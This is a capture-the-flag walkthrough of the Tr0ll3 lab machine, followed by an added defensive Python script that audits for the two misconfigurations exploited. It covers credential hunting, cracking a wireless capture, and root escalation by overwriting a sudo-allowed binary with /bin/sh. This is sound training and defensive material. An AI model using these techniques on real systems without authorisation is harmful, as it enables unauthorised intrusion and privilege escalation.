The Tr0ll is back with the 3rd machine in the series!
start with credentials in plaintext
The start is atypical: the machine only has the SSH port open, and the author's description tells us to use start:here for the login, so let's try to SSH with these credentials. It works and we are in right away.
start@Tr0ll3:~$ ls
bluepill redpill
If you take the bluepill, you are being taught the secrets of how to make a hacker waste time.
Jumping straight into enumeration with LinEnum, we notice there are many potentially interesting users on the system:
maleus
wytshadow
genphlux
eagle
When searching for world writable files, we find the following:
[-] Files not owned by user but writable by group:
-rwxrwxrwx 1 root root 49962 Aug 2 00:23 /var/log/.dist-manage/wytshadow.cap
-rwxrwxrwx 1 eagle russ 35737600 Aug 2 00:24 /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt
We also find possible credentials for the eagle user among the files owned by the start user:
I transferred the capture file to my machine and also checked the contents of that troll file; it was filled with blocks of strings like these:
QBu4rIhKXJ
DKbpcZQpO3
T7JUfO0jjZ
Before looking at the exfiltrated file, I switched to the user eagle with the above password.
Be the eagle – wireless traffic cracking
The packet capture file contains wireless traffic, so I thought about cracking it with aircrack-ng. For the first attempt, I fed it the gold_star.txt file as wordlist, and it found the passphrase in 5 minutes:
There was nothing particularly interesting from eagle’s point of view, other than the sudo privilege for starting the vsftpd service:
User eagle may run the following commands on Tr0ll3:
(root) /usr/sbin/service vsftpd start
We keep this option on the bench for now, since we have something else to work with. We know there's a wytshadow user, and the .cap file had the same name, so I used the recovered key as the password for this account: new user, new shell!
wytshadow and the Lynx
Inside the home directory we find a SUID executable:
-rwsrwxrwx 1 genphlux root 8566 Jun 17 2015 oohfun
wytshadow@Tr0ll3:~$ file oohfun
oohfun: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.24, BuildID[sha1]=309f4fec949b0e2eb3f6ec83ccadff89c553e397, not stripped
If we run it, we see the string “iM Cr@zY L1k3 AAA LYNX” printed continuously on the screen. If we look in the strings of the file, we see a reference to a shell script:
/lol/bin/run.sh -b 0.0.0.0
If we look at that file, we see it does exactly what we saw earlier, printing the string in an infinite loop:
I was curious about what was inside /lol; it appears to be a JBoss installation:
genphlux@Tr0ll3:/lol$ ls
bin client common copyright.txt docs jar-versions.xml JBossORG-EULA.txt lgpl.html lib readme.html server
genphlux can also start an Apache server:
User genphlux may run the following commands on Tr0ll3:
(root) /usr/sbin/service apache2 start
I started the server but only got a 403 Forbidden, lynx or not. Moving on for now, I SSH'ed in as maleus with the private key I had found.
maleus – don’t even bother
Inside his home we find another binary:
maleus@Tr0ll3:~$ file dont_even_bother
dont_even_bother: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.24, BuildID[sha1]=455a77b2503f19c1a09cbc9b66d513b2fa3af73c, not stripped
This binary asks for a password:
maleus@Tr0ll3:~$ ./dont_even_bother
Enter the password :
das
Wrong Password
And in the strings we find what is probably the message shown for entering the correct password:
Your reward is just knowing you did it! :-P
This reward isn't really that enticing, so I didn't jump into reversing this; it might be a troll dead end. I continued looking through the home folder and found a possible password inside the .viminfo file:
# Registers:
""1 LINE 0
passwd
"2 LINE 0
B^slc8I$
"3 LINE 0
passswd
The password belongs to maleus and now we can check his sudo privileges. We find out he can run the executable from earlier as root:
User maleus may run the following commands on Tr0ll3:
(root) /home/maleus/dont_even_bother
From the strings, we already assume the executable itself is just a troll. However, maleus has write privileges over this file:
maleus@Tr0ll3:~$ ls -l
total 12
-rwxrwxr-x 1 maleus maleus 8674 Jun 18 2015 dont_even_bother
So we can just replace this useless binary with one that would give us a root shell:
maleus@Tr0ll3:~$ cat /bin/sh > dont_even_bother
maleus@Tr0ll3:~$ sudo ./dont_even_bother
[sudo] password for maleus:
# cat /root/flag.txt
You are truly a Jedi!
Twitter Proof:
Pr00fThatTh3L33tHax0rG0tTheFl@g!!
@Maleus21
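The two misconfigurations that carried this box, the world-writable SUID binary oohfun and the sudo target dont_even_bother that its own invoking user can overwrite, are exactly what a defender should audit for. The following is an added example, not code from the original writeup: it parses ls -l and sudo -l style output and flags both conditions. The sample lines are constructed to mirror the page's findings, and the /home/... paths are assumed.

```python
import re

# Constructed sample input modelled on the page's findings (paths assumed, not real output).
LS_LINES = """\
-rwsrwxrwx 1 genphlux root 8566 Jun 17 2015 /home/wytshadow/oohfun
-rwxrwxr-x 1 maleus maleus 8674 Jun 18 2015 /home/maleus/dont_even_bother
-rwxr-xr-x 1 root root 131024 Jan 1 2015 /usr/sbin/service
"""
SUDO_LINES = """\
User maleus may run the following commands on Tr0ll3:
    (root) /home/maleus/dont_even_bother
    (root) /usr/sbin/service apache2 start
"""

def parse_ls(text):
    """Map path -> (mode string, owner, group) from `ls -l` style lines."""
    files = {}
    for line in text.splitlines():
        parts = line.split(None, 8)  # perms links owner group size mon day year name
        if len(parts) == 9:
            files[parts[8]] = (parts[0], parts[2], parts[3])
    return files

def parse_sudo(text):
    """Extract the command paths from `sudo -l` style output, e.g. '(root) /path ...'."""
    return [m.group(1) for m in re.finditer(r"\(\w+\)\s+(\S+)", text)]

def writable_by(mode, owner, group, user, groups):
    """True if `user` (with group memberships `groups`) can write the file.
    mode is the 10-char ls permission string: [type][ugo rwx]."""
    if mode[8] == "w":                      # world-writable
        return True
    if group in groups and mode[5] == "w":  # group-writable and user is a member
        return True
    return owner == user and mode[2] == "w"  # owner-writable

def audit(user, groups, ls_text, sudo_text):
    """Flag sudo targets the user can overwrite and SUID binaries anyone can overwrite."""
    files = parse_ls(ls_text)
    findings = []
    for path in parse_sudo(sudo_text):
        if path in files and writable_by(*files[path], user, groups):
            findings.append(f"sudo target {path} is writable by {user}")
    for path, (mode, owner, group) in files.items():
        if mode[3] == "s" and mode[8] == "w":
            findings.append(f"SUID binary {path} is world-writable")
    return findings
```

Running audit("maleus", {"maleus"}, LS_LINES, SUDO_LINES) reports both findings while leaving /usr/sbin/service, which only root can write, unflagged.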
This was another fun machine in the series. In the end, we trolled the troll again!
 ________________________________________
/ QOTD:                                  \
|                                        |
\ All I want is more than my fair share. /
 ----------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||